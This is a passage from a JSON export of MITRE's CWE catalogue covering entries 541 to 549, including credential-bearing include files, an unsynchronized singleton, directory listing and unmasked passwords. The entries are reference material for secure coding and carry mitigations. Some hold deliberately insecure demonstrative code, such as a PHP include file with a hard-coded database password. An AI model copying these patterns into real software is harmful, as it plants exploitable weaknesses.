Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Source Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Source Code","attr":{"@_Date":"2020-02-24"}}]}},"541":{"attr":{"@_ID":"541","@_Name":"Inclusion of Sensitive Information in an Include File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not store sensitive information in include files."},{"Phase":["Architecture and Design","System Configuration"],"Description":"Protect include files from being exposed."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-104"},"Intro_Text":"The following code uses an include file to store database credentials:","Body_Text":["database.inc","login.php","If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?php$dbName = \'usersDB\';$dbPassword = \'skjdh#67nkjd3$3$\';?&gt;","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?phpinclude(\'database.inc\');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?&gt;","xhtml:br":["","","",""]}}]}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Include Source Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Include Source Code","attr":{"@_Date":"2020-02-24"}}]}},"542":{"attr":{"@_ID":"542","@_Name":"DEPRECATED: Information Exposure Through Cleanup Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level.  See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Cleanup Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Cleanup Log Files","attr":{"@_Date":"2018-03-27"}}]}},"543":{"attr":{"@_ID":"543","@_Name":"Use of Singleton Pattern Without Synchronization in a Multithreaded Context","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the singleton pattern when creating a resource within a multithreaded environment.","Extended_Description":"The use of a singleton pattern may not be thread-safe.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Other","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use the Thread-Specific Storage Pattern. See References."},{"Phase":"Implementation","Description":"Do not use member fields to store information in the Servlet. In multithreading environments, storing user data in Servlet member fields introduces a data access race condition."},{"Phase":"Implementation","Description":"Avoid using the double-checked locking pattern in language versions that cannot guarantee thread safety. This pattern may be used to avoid the overhead of a synchronized call, but in certain versions of Java (for example), this has been shown to be unsafe because it still introduces a race condition (CWE-209).","Effectiveness":"Limited"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This method is part of a singleton pattern, yet the following singleton() pattern is not thread-safe. It is possible that the method will create two objects instead of only one.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static NumberConverter singleton;public static NumberConverter get_singleton() {}","xhtml:br":"","xhtml:div":{"#text":"if (singleton == null) {}return singleton;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"singleton = new NumberConverter();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}},"Body_Text":["Consider the following course of events:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Thread A enters the method, finds singleton to be null, begins the NumberConverter constructor, and then is swapped out of execution."},{"xhtml:div":"Thread B enters the method and finds that singleton remains null. This will happen if A was swapped out during the middle of the constructor, because the object reference is not set to point at the new object on the heap until the object is fully initialized."},{"xhtml:div":"Thread B continues and constructs another NumberConverter object and returns it while exiting the method."},{"xhtml:div":"Thread A continues, finishes constructing its NumberConverter object, and returns its version."}]}},"At this point, the threads have created and returned two different objects."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC07-J","Entry_Name":"Prevent multiple instantiations of singleton objects"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-474"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Use of Singleton Pattern in a Non-thread-safe Manner","attr":{"@_Date":"2010-09-27"}}}},"544":{"attr":{"@_ID":"544","@_Name":"Missing Standardized Error Handling Mechanism","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses.","Extended_Description":"If the application handles error messages individually, on a one-by-one basis, this is likely to result in inconsistent error handling. The causes of errors may be lost. Also, detailed information about the causes of an error may be unintentionally returned to the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Quality Degradation","Unexpected State","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"define a strategy for handling errors of different severities, such as fatal errors versus basic log events. Use or create built-in language features, or an external package, that provides an easy-to-use API and define coding standards for the detection and handling of errors."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR00-C","Entry_Name":"Adopt and implement a consistent and comprehensive error-handling policy"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":[{"#text":"Missing Error Handling Mechanism","attr":{"@_Date":"2009-03-10"}},{"#text":"Failure to Use a Standardized Error Handling Mechanism","attr":{"@_Date":"2010-12-13"}}]}},"545":{"attr":{"@_ID":"545","@_Name":"DEPRECATED: Use of Dynamic Class Loading","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it partially overlaps CWE-470, it describes legitimate programmer behavior, and other portions will need to be integrated into other entries.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Dynamic Class Loading","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Dynamic Class Loading","attr":{"@_Date":"2017-05-03"}}]}},"546":{"attr":{"@_ID":"546","@_Name":"Suspicious Comment","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses.","Extended_Description":"Many suspicious comments, such as BUG, HACK, FIXME, LATER, LATER2, TODO, in the code indicate missing security functionality and checking. Others indicate code problems that programmers should fix, such as hard-coded variables, error handling, not using stored procedures, and performance issues.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation","Note":"Suspicious comments could be an indication that there are problems in the source code that may need to be fixed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Documentation","Description":"Remove comments that suggest the presence of bugs, incomplete functionality, or weaknesses, before deploying the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following excerpt demonstrates the use of a suspicious comment in an incomplete code block that may have security repercussions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (user == null) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// TODO: Handle null user condition."}}}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"547":{"attr":{"@_ID":"547","@_Name":"Use of Hard-coded, Security-relevant Constants","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change.","Extended_Description":"If the developer does not find all occurrences of the hard-coded constants, an incorrect policy decision may be made if one of the constants is not changed. Making changes to these values will require code changes that may be difficult or impossible once the system is released to the field. In addition, these hard-coded values may become available to attackers if the code is ever disclosed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Quality Degradation"],"Note":"The existence of hardcoded constants could cause unexpected behavior and the introduction of weaknesses during code maintenance or when making changes to the code if all occurrences are not modified. The use of hardcoded constants is an indication of poor quality."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid using hard-coded constants. Configuration files offer a more flexible solution."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The usage of symbolic names instead of hard-coded constants is preferred.","Body_Text":["The following is an example of using a hard-coded constant instead of a symbolic name.","If the buffer value needs to be changed, then it has to be altered in more than one place. If the developer forgets or does not find all occurences, in this example it could lead to a buffer overflow.","In this example the developer will only need to change one value and all references to the buffer size are updated, as a symbolic name is used instead of a hard-coded constant."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buffer[1024];...fgets(buffer, 1024, stdin);","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"enum { MAX_BUFFER_SIZE = 1024 };...char buffer[MAX_BUFFER_SIZE];...fgets(buffer, MAX_BUFFER_SIZE, stdin);","xhtml:br":["","","",""]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL06-C","Entry_Name":"Use meaningful symbolic constants to represent literal values in program logic"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Security-relevant Constants","attr":{"@_Date":"2008-04-11"}}}},"548":{"attr":{"@_ID":"548","@_Name":"Exposure of Information Through Directory Listing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.","Extended_Description":"A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"Exposing the contents of a directory can lead to an attacker gaining access to source code or providing useful information for the attacker to devise exploits, such as creation times of files or any information that may be encoded in file names. The directory listing may also compromise private or confidential data."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include restricting access to important directories or files by adopting a need to know requirement for both the document and server root, and turning off features such as Automatic Directory Listings that could expose private files and provide information that could be utilized by an attacker when formulating or conducting an attack."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":16,"Entry_Name":"Directory Indexing"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Directory Listing","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Directory Listing","attr":{"@_Date":"2020-02-24"}}]}},"549":{"attr":{"@_ID":"549","@_Name":"Missing Password Field Masking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Requirements"],"Description":"Recommendations include requiring all password fields in your web application be masked to prevent other users from seeing this information."}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content 